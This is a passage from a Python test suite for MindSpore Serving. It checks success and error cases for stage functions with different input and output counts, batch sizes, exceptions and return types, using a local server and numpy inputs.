@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content)
    # Client
    x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    instances = [{"x1": x1, "x2": x2}] * 3
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # The failure may surface either as a dict-level error or per-instance.
    if isinstance(result, dict):
        assert "servable is not available" in result["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
    else:
        assert "servable is not available" in result[0]["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_output_less_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared outputs_count > python function outputs count
    Expectation: Serving server report error.
    """
    # func_test returns a single value while the stage declares outputs_count=2.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content)
    # Client
    x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    instances = [{"x1": x1, "x2": x2}] * 3
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # The failure may surface either as a dict-level error or per-instance.
    if isinstance(result, dict):
        assert "servable is not available" in result["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
    else:
        assert "servable is not available" in result[0]["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_error_outputs_count_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared outputs_count > python function outputs count
    Expectation: Serving server report error.
    """
    # outputs_count=3 while predict unpacks only 2 names -> unpack error at startup.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=3)
    return y1, y2
"""
    try:
        start_serving_server(servable_content)
        assert False
    except RuntimeError as e:
        # Unpacking three declared stage outputs into two names fails.
        assert "too many values to unpack (expected 2)" in str(e)
@serving_test
def test_stage_function_one_function_stage_error_outputs_count2_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared outputs_count < python function outputs count
    Expectation: Serving server report error.
    """
    # outputs_count=1 yields a single tensor, but predict unpacks two names.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    return x1+x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=1)
    return y1, y2
"""
    try:
        start_serving_server(servable_content)
        assert False
    except RuntimeError as e:
        # A single stage output cannot be unpacked into two names.
        assert "cannot unpack non-iterable _TensorDef object" in str(e)
@serving_test
def test_stage_function_one_function_stage_input_more_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared inputs count < python function inputs count
    Expectation: Serving server startup error.
    """
    # func_test takes 3 args but add_stage passes only 2 inputs.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2, x3):
    return x1, x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    try:
        start_serving_server(servable_content)
        assert False
    except RuntimeError as e:
        assert "function func_test input args count 3 not match the count 2 registered in method" in str(e)
@serving_test
def test_stage_function_one_function_stage_input_less_failed():
    """
    Feature: test servable_config.py stage
    Description: Test stage declared inputs count > python function inputs count
    Expectation: Serving server startup error.
    """
    # func_test takes 1 arg but add_stage passes 2 inputs.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1):
    return x1, x2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    try:
        start_serving_server(servable_content)
        assert False
    except RuntimeError as e:
        assert "function func_test input args count 1 not match the count 2 registered in method" in str(e)
@serving_test
def test_stage_function_one_function_stage_raise_exception_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function raise exception
    Expectation: Serving server report error.
    """
    # The stage function raises on every call.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    raise RuntimeError("runtime error text")
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content)
    # Client
    x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    instances = [{"x1": x1, "x2": x2}] * 3
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # The failure may surface either as a dict-level error or per-instance.
    if isinstance(result, dict):
        assert "servable is not available" in result["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
    else:
        assert "servable is not available" in result[0]["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_none_outputs_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function return None
    Expectation: Serving server report error.
    """
    # The stage function only prints and implicitly returns None.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    print("none outputs")
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content)
    # Client
    x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    instances = [{"x1": x1, "x2": x2}] * 3
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # The failure may surface either as a dict-level error or per-instance.
    if isinstance(result, dict):
        assert "servable is not available" in result["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
    else:
        assert "servable is not available" in result[0]["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_invalid_output_dtype_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function return invalid data, dtype is not supported
    Expectation: Serving server report error.
    """
    # The stage function returns numpy dtype objects, not tensors.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test(x1, x2):
    return x1.dtype, x2.dtype
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test, x1, x2, outputs_count=2)
    return y1, y2
"""
    base = start_serving_server(servable_content)
    # Client
    x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
    x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
    instances = [{"x1": x1, "x2": x2}] * 3
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # The failure may surface either as a dict-level error or per-instance.
    if isinstance(result, dict):
        assert "servable is not available" in result["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result["error"]
    else:
        assert "servable is not available" in result[0]["error"] \
               or f"Call Function '{base.servable_name}.func_test' Failed" in result[0]["error"]
@serving_test
def test_stage_function_one_function_stage_batch_size_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, and result output count is 1, tuple/list
    Expectation: Serving server work ok.
    """
    # Batched stage: receives a batch of instances, returns a list of
    # single-element lists ([y] per instance).
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        results.append([y])
    return results
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size2_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, and result output count is 1, not tuple/list
    Expectation: Serving server work ok.
    """
    # Batched stage: returns a flat list of results (y per instance, not [y]).
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        results.append(y)
    return results
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size3_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, use yield, not tuple/list
    Expectation: Serving server work ok.
    """
    # Batched stage as a generator: yields y per instance.
    # NOTE(review): `results` in the servable below is unused in this variant.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        yield y
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size4_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, use yield, use tuple/list
    Expectation: Serving server work ok.
    """
    # Batched stage as a generator: yields [y] (a list) per instance.
    # NOTE(review): `results` in the servable below is unused in this variant.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        yield [y]
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_equal1_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, batch size = 1
    Expectation: Serving server work ok.
    """
    # Same generator-style batched stage as above, but with batch_size=1.
    # NOTE(review): `results` in the servable below is unused in this variant.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        yield y
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=1)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_0_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, batch size=0, batch size is determined by system
    Expectation: Serving server work ok.
    """
    # batch_size=0 lets the serving system pick the batch size.
    # NOTE(review): `results` in the servable below is unused in this variant.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        yield y
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=0)
    return y
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    ys = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y = x1 + x2
        instances.append({"x1": x1, "x2": x2})
        ys.append(y)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y"], ys[0])
    assert is_float_equal(result[1]["y"], ys[1])
    assert is_float_equal(result[2]["y"], ys[2])
@serving_test
def test_stage_function_one_function_stage_error_batch_size_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, batch size is invalid
    Expectation: Serving server startup failed.
    """
    # batch_size=-1 is rejected at server startup.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y = instance[0] + instance[1]
        yield y
@register.register_method(output_names="y")
def predict(x1, x2):
    y = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=-1)
    return y
"""
    try:
        start_serving_server(servable_content, model_file="tensor_add.mindir")
        assert False
    except RuntimeError as e:
        assert "Parameter 'batch_size' should be >= 0" in str(e)
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, yield, result outputs count is 2
    Expectation: Serving server work well.
    """
    # Batched generator stage yielding two outputs per instance: (x1+x2, x1-x2).
    # NOTE(review): `results` in the servable below is unused in this variant.
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        yield y1, y2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client
    instances = []
    y1s = []
    y2s = []
    for i in range(3):
        x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)
        x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        y1 = x1 + x2
        y2 = x1 - x2
        instances.append({"x1": x1, "x2": x2})
        y1s.append(y1)
        y2s.append(y2)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    # Float results compared with absolute tolerance via is_float_equal.
    assert is_float_equal(result[0]["y1"], y1s[0])
    assert is_float_equal(result[1]["y1"], y1s[1])
    assert is_float_equal(result[2]["y1"], y1s[2])
    assert is_float_equal(result[0]["y2"], y2s[0])
    assert is_float_equal(result[1]["y2"], y2s[1])
    assert is_float_equal(result[2]["y2"], y2s[2])
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs_multi_times_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, multi stage
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        yield y1, y2
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
    y1, y2 = register.add_stage(func_test_batch, y1, y2, outputs_count=2, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the same stage is applied twice, so mirror both passes locally.
    instances = []
    expect_y1 = []
    expect_y2 = []
    for idx in range(3):
        a = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (idx + 1)
        b = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (idx + 1)
        stage1_sum, stage1_diff = a + b, a - b
        instances.append({"x1": a, "x2": b})
        expect_y1.append(stage1_sum + stage1_diff)
        expect_y2.append(stage1_sum - stage1_diff)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    for idx in range(3):
        assert is_float_equal(result[idx]["y1"], expect_y1[idx])
        assert is_float_equal(result[idx]["y2"], expect_y2[idx])
@serving_test
def test_stage_function_one_function_stage_batch_size_two_outputs2_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, result output count is 2
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1, y2])
    return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2 = register.add_stage(func_test_batch, x1, x2, outputs_count=2, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: stage returns a list of results rather than yielding them.
    instances = []
    expect_y1 = []
    expect_y2 = []
    for idx in range(3):
        a = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (idx + 1)
        b = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (idx + 1)
        instances.append({"x1": a, "x2": b})
        expect_y1.append(a + b)
        expect_y2.append(a - b)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    for idx in range(3):
        assert is_float_equal(result[idx]["y1"], expect_y1[idx])
        assert is_float_equal(result[idx]["y2"], expect_y2[idx])
@serving_test
def test_stage_function_one_function_stage_batch_size_input_more_success():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, used inputs count 2 < declared inputs count 3
    Expectation: Serving server work well.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1, y2])
    return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2, x3):
    y1, y2 = register.add_stage(func_test_batch, x1, x2, x3, outputs_count=2, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: x3 is declared but unused by the stage function; only x1/x2 affect outputs.
    instances = []
    expect_y1 = []
    expect_y2 = []
    for idx in range(3):
        a = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (idx + 1)
        b = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (idx + 1)
        c = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (idx + 1)
        instances.append({"x1": a, "x2": b, "x3": c})
        expect_y1.append(a + b)
        expect_y2.append(a - b)
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    for idx in range(3):
        assert is_float_equal(result[idx]["y1"], expect_y1[idx])
        assert is_float_equal(result[idx]["y2"], expect_y2[idx])
@serving_test
def test_stage_function_one_function_stage_batch_size_input_less_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, used inputs count 2 > declared inputs count 1
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1, y2])
    return results
@register.register_method(output_names=["y1"])
def predict(x1):
    y1, y2 = register.add_stage(func_test_batch, x1, outputs_count=2, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the stage reads two inputs while only one is declared, expect an error reply.
    instances = [{"x1": np.array([[1.1, 2.2], [3.3, 4.4]], np.float32) * 1.1 * (i + 1)} for i in range(3)]
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_output_more_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, outputs count 2 < declared outputs_count 3
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1, y2])
    return results
@register.register_method(output_names=["y1", "y2"])
def predict(x1, x2):
    y1, y2, y3 = register.add_stage(func_test_batch, x1, x2, outputs_count=3, batch_size=2)
    return y1, y2
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: declared outputs_count 3 exceeds what the stage produces, expect an error reply.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_output_less_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, outputs count 2 > declared outputs_count 1
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        results.append([y1, y2])
    return results
@register.register_method(output_names=["y1"])
def predict(x1, x2):
    y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y1
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the stage produces two outputs but only one is declared, expect an error reply.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_output_less2_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, outputs count 2 > declared outputs_count 1, yield
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    results = []
    for instance in instances:
        y1 = instance[0] + instance[1]
        y2 = instance[0] - instance[1]
        yield y1, y2
@register.register_method(output_names=["y1"])
def predict(x1, x2):
    y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y1
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the generator yields two outputs per instance but only one is declared.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_raise_exception_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, raise exception
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    raise RuntimeError("runtime error test")
@register.register_method(output_names=["y1"])
def predict(x1, x2):
    y1 = register.add_stage(func_test_batch, x1, x2, outputs_count=1, batch_size=2)
    return y1
"""
    base = start_serving_server(servable_content, model_file="tensor_add.mindir")
    # Client: the stage raises, so every reply must carry an error message.
    instances = []
    for i in range(3):
        a = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
        b = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
        instances.append({"x1": a, "x2": b})
    client = create_client("localhost:5500", base.servable_name, "predict")
    result = client.infer(instances)
    print("result", result)
    err = result["error"] if isinstance(result, dict) else result[0]["error"]
    assert "servable is not available" in err \
           or f"Call Function '{base.servable_name}.func_test_batch' Failed" in err
@serving_test
def test_stage_function_one_function_stage_batch_size_none_return_failed():
    """
    Feature: test servable_config.py stage
    Description: Stage python function run with batch_size parameter, return None
    Expectation: Serving server report error.
    """
    servable_content = r"""
import numpy as np
from mindspore_serving.server import register
tensor_add = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
def func_test_batch(instances):
    pass
